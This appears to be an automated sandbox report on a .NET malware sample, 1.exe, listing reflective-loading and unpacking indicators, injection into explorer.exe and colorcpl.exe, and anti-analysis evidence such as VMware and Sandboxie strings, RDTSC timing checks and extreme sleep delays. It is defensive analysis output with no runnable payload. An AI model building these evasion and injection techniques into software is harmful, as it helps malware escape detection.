Source: 0.2.1.exe.46e00000.8.raw.unpack, ContextConfigurationAdapter.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.1.exe.4009280.3.raw.unpack, ContextConfigurationAdapter.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.1.exe.4009280.3.raw.unpack, ContextConfigurationAdapter.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.1.exe.4009280.3.raw.unpack, ContextConfigurationAdapter.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, ContextConfigurationAdapter.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, ContextConfigurationAdapter.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, ContextConfigurationAdapter.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: 1.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\1.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\1.exe	Mutant created: \Sessions\1\BaseNamedObjects\LtuPWOmKmRtPgVVETlqTXm
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3948:120:WilError_03

Source: 0.2.1.exe.3fbfe60.5.raw.unpack, Callback.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, Callback.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1.exe.46e00000.8.raw.unpack, Callback.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1.exe.46e00000.8.raw.unpack, Callback.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1.exe.4009280.3.raw.unpack, Callback.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1.exe.4009280.3.raw.unpack, Callback.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Users\user\Desktop\1.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: colorcpl.pdbGCTL source: 1.exe, 00000002.00000002.2046399747.0000000001520000.00000040.10000000.00040000.00000000.sdmp, 1.exe, 00000002.00000002.2046273682.0000000001297000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449033353.0000000000E00000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: colorcpl.pdb source: 1.exe, 00000002.00000002.2046399747.0000000001520000.00000040.10000000.00040000.00000000.sdmp, 1.exe, 00000002.00000002.2046273682.0000000001297000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449033353.0000000000E00000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 1.exe, 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2047949861.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2045475462.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 1.exe, 1.exe, 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000004.00000003.2047949861.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2045475462.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 1.exe, SwitchValueState.cs	.Net Code: CspKeyContainerInfo System.AppDomain.Load(byte[])
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, ContextConfigurationAdapter.cs	.Net Code: CustomizeParams System.Reflection.Assembly.Load(byte[])
Source: 0.2.1.exe.46e00000.8.raw.unpack, ContextConfigurationAdapter.cs	.Net Code: CustomizeParams System.Reflection.Assembly.Load(byte[])
Source: 0.2.1.exe.4009280.3.raw.unpack, ContextConfigurationAdapter.cs	.Net Code: CustomizeParams System.Reflection.Assembly.Load(byte[])
Source: 3.2.explorer.exe.111b7960.0.raw.unpack, SwitchValueState.cs	.Net Code: CspKeyContainerInfo System.AppDomain.Load(byte[])
Source: 4.2.colorcpl.exe.5377960.3.raw.unpack, SwitchValueState.cs	.Net Code: CspKeyContainerInfo System.AppDomain.Load(byte[])

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.1.exe.3fbfe60.5.raw.unpack, Callback.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.1.exe.46e00000.8.raw.unpack, Callback.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.1.exe.4009280.3.raw.unpack, Callback.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_02C8E7C2 push eax; ret	0_2_02C8E7C9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0041D121 push ds; ret	2_2_0041D137
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_00416290 push ds; iretd	2_2_00416291
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0041B3F2 push eax; ret	2_2_0041B3F8
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0041B3FB push eax; ret	2_2_0041B462
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0041B3A5 push eax; ret	2_2_0041B3F8
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_00415BBB push es; retf	2_2_00415C36
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0041B45C push eax; ret	2_2_0041B462
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_016F225F pushad ; ret	2_2_016F27F9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_016F27FA pushad ; ret	2_2_016F27F9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017209AD push ecx; mov dword ptr [esp], ecx	2_2_017209B6
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_016F283D push eax; iretd	2_2_016F2858
Source: C:\Windows\explorer.exe	Code function: 3_2_103F60DE push edi; retf	3_2_103F60DF
Source: C:\Windows\explorer.exe	Code function: 3_2_109820DE push edi; retf	3_2_109820DF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E227FA pushad ; ret	4_2_04E227F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E2225F pushad ; ret	4_2_04E227F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E2283D push eax; iretd	4_2_04E22858
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E509AD push ecx; mov dword ptr [esp], ecx	4_2_04E509B6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E36290 push ds; iretd	4_2_02E36291
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E3B3F2 push eax; ret	4_2_02E3B3F8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E3B3FB push eax; ret	4_2_02E3B462
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E3B3A5 push eax; ret	4_2_02E3B3F8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E3D121 push ds; ret	4_2_02E3D137
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E3B45C push eax; ret	4_2_02E3B462
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E35BBB push es; retf	4_2_02E35C36

Source: initial sample

Static PE information: section name: .text entropy: 6.8175261260266655

Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1.exe PID: 1892, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\1.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 0000000002E285E4 second address: 0000000002E285EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 0000000002E2896E second address: 0000000002E28974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\1.exe TID: 6108	Thread sleep time: -51118s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1.exe TID: 1396	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5020	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6564	Thread sleep count: 140 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6564	Thread sleep time: -280000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6564	Thread sleep count: 9832 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6564	Thread sleep time: -19664000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\1.exe

Code function: 2_2_004088A0 rdtsc

2_2_004088A0

Source: C:\Users\user\Desktop\1.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 886			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 9832			Jump to behavior

Source: C:\Users\user\Desktop\1.exe	API coverage: 1.7 %
Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 1.8 %

Source: C:\Users\user\Desktop\1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\1.exe	Thread delayed: delay time: 51118			Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000003.00000002.4451321955.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000003.00000002.4453052192.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.2005157411.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.2002563045.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000003.00000002.4448974063.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 0000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000002.4453052192.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000000.2002563045.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000003.00000002.4451321955.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000003.00000000.2002563045.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000003.00000000.2002563045.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: explorer.exe, 00000003.00000002.4448974063.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000003.00000000.2005157411.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.2003510228.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\1.exe

Code function: 2_2_004088A0 rdtsc

2_2_004088A0

Source: C:\Users\user\Desktop\1.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F4164 mov eax, dword ptr fs:[00000030h]	2_2_017F4164
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F4164 mov eax, dword ptr fs:[00000030h]	2_2_017F4164
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B8158 mov eax, dword ptr fs:[00000030h]	2_2_017B8158
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01726154 mov eax, dword ptr fs:[00000030h]	2_2_01726154
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01726154 mov eax, dword ptr fs:[00000030h]	2_2_01726154
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171C156 mov eax, dword ptr fs:[00000030h]	2_2_0171C156
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h]	2_2_017B4144
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h]	2_2_017B4144
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B4144 mov ecx, dword ptr fs:[00000030h]	2_2_017B4144
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h]	2_2_017B4144
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h]	2_2_017B4144
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01750124 mov eax, dword ptr fs:[00000030h]	2_2_01750124
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CA118 mov ecx, dword ptr fs:[00000030h]	2_2_017CA118
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CA118 mov eax, dword ptr fs:[00000030h]	2_2_017CA118
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CA118 mov eax, dword ptr fs:[00000030h]	2_2_017CA118
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CA118 mov eax, dword ptr fs:[00000030h]	2_2_017CA118
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E0115 mov eax, dword ptr fs:[00000030h]	2_2_017E0115
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]	2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h]	2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]	2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]	2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h]	2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]	2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]	2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h]	2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]	2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h]	2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017501F8 mov eax, dword ptr fs:[00000030h]	2_2_017501F8
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F61E5 mov eax, dword ptr fs:[00000030h]	2_2_017F61E5
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0179E1D0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0179E1D0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179E1D0 mov ecx, dword ptr fs:[00000030h]	2_2_0179E1D0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0179E1D0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0179E1D0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E61C3 mov eax, dword ptr fs:[00000030h]	2_2_017E61C3
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E61C3 mov eax, dword ptr fs:[00000030h]	2_2_017E61C3
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A019F mov eax, dword ptr fs:[00000030h]	2_2_017A019F
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A019F mov eax, dword ptr fs:[00000030h]	2_2_017A019F
